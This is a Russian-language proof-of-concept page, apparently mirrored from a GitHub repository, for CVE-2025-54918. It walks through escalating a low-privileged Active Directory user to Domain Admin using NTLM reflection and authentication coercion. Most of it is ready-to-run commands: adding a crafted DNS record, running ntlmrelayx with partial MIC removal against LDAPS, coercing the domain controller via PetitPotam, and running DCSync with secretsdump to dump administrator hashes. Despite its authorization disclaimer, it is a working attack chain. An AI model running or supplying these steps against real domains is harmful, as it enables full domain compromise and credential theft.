## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WH0AM123-CVE-2025-54918-POC
# CVE-2025-54918 – Доказательство концепции (PoC)
## ⚠️ Важное уведомление
> **ВАЖНО:**
> Для тестирования **CVE-2025-54918** необходимо **создать DNS-запись в целевой среде Active Directory**.
> Всегда консультируйтесь с клиентом и получайте **явное разрешение** перед тестированием, так как это может повлиять на поведение DNS и аутентификации в производственных средах.
Этот репозиторий содержит **техническое доказательство концепции** , демонстрирующее, как **пользователь домена с низкими привилегиями** может повысить свои права до **уровня администратора домена** , злоупотребляя **отражением NTLM в сочетании с принуждением аутентификации**.
Примечание: CVE эксплуатируется даже при установленном значении True для подписи, что является значением по умолчанию для контроллера домена. Также исправление для CVE-2025-54918 было выпущено для Windows 2025, а CVE-2025-33073 (непреднамеренно) исправило проблему для Windows 2022.
Более технический разбор доступен на моей странице Medium: https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1
* * *
## Среда
* **IP контроллера домена:** `192.168.140.150` (Подпись установлена в True, что является значением по умолчанию для контроллера домена)
* **IP атакующего:** `192.168.140.135`
* **Домен:** `nahya.local`
* **Пользователь:** `test` Действительный пользователь домена (без привилегий DCSync)
* * *
## Инструментарий
Клонируйте необходимые репозитории:
root@kitploit:~
git clone https://github.com/dirkjanm/krbrelayx.git
git clone https://github.com/decoder-it/impacket-partial-mic.git
* * *
## Базовая проверка (ожидаемая неудача)
Убедитесь, что пользователь не может выполнить DCSync до эксплуатации:
root@kitploit:~
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

* * *
## Шаг 1: Добавление вредоносной DNS-записи
Создайте DNS-запись, используя **NetBIOS-имя + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA** , которое разрешается в IP атакующего.
root@kitploit:~
python3 dnstool.py -u 'nahya.local\USERNAME' -p 'PASSWORD' \
dc.nahya.local -a add \
-r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' \
-d '192.168.140.135' -dns-ip 192.168.140.150

* * *
## Шаг 2: Запуск NTLM-ретранслятора (Терминал 1)
Запустите `ntlmrelayx` с **частичным удалением MIC** и включенной эскалацией LDAP:
root@kitploit:~
python3 impacket-partial-mic/examples/ntlmrelayx.py --remove-mic-partial -smb2support -t ldaps://DC --escalate-user USERNAME --no-validate-privs

* * *
## Шаг 3: Принуждение аутентификации контроллера домена (Терминал 2)
Принудите контроллер домена аутентифицироваться на контролируемой атакующим DNS-записи с помощью техники принуждения (PetitPotam):
root@kitploit:~
nxc smb DC -u 'USERNAME' -p 'PASSWORD' -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

* * *
## Шаг 4: Подтверждение эксплуатации (DCSync)
Повторно запустите `secretsdump`, чтобы подтвердить повышение привилегий:
root@kitploit:~
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC
✅ Ожидаемый результат: успешный **DCSync** и получение **хешей администратора домена**

* * *
## Результат
На этом этапе атакующий получил:
* Ретранслированную NTLM-аутентификацию от контроллера домена (Signing True)
* Повышенные привилегии через LDAP
* Достигнут **DCSync** , что привело к **полной компрометации домена**
Обратитесь к **статье на Medium** для получения подробного объяснения уязвимости и цепочки атак.
* * *
## 🙏 Благодарности
Эта работа была бы невозможна без:
* **Bryan De Houwer** – Автор **CVE-2025-54918** https://www.linkedin.com/in/bryan-de-houwer/
* **Andrea Pierini** – За его отличные исследования и блоги на **decoder.cloud** https://www.linkedin.com/in/andrea-pierini-aba9a37/
* **Andrea Pierini** – За реализацию `impacket-partial-mic`
https://github.com/decoder-it/impacket-partial-mic
* * *
## 🔗 Ссылки
* **Analyzing NTLM & LDAP Authentication Bypass Vulnerability** – Блог CrowdStrike
https://www.crowdstrike.com/en-us/blog/analyzing-ntlm-ldap-authentication-bypass-vulnerability/
* **Microsoft Security Advisory – CVE-2025-54918** – Руководство по обновлению MSRC
https://msrc.microsoft.com/update-guide/advisory/CVE-2025-54918
* * *
## Отказ от ответственности
Это доказательство концепции предоставляется **только для образовательных целей и авторизованного тестирования безопасности**.
* Не используйте эту технику против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
* Автор **не несет ответственности** за неправильное использование или ущерб.
* Всегда следуйте практикам ответственного раскрытия и этичного хакинга.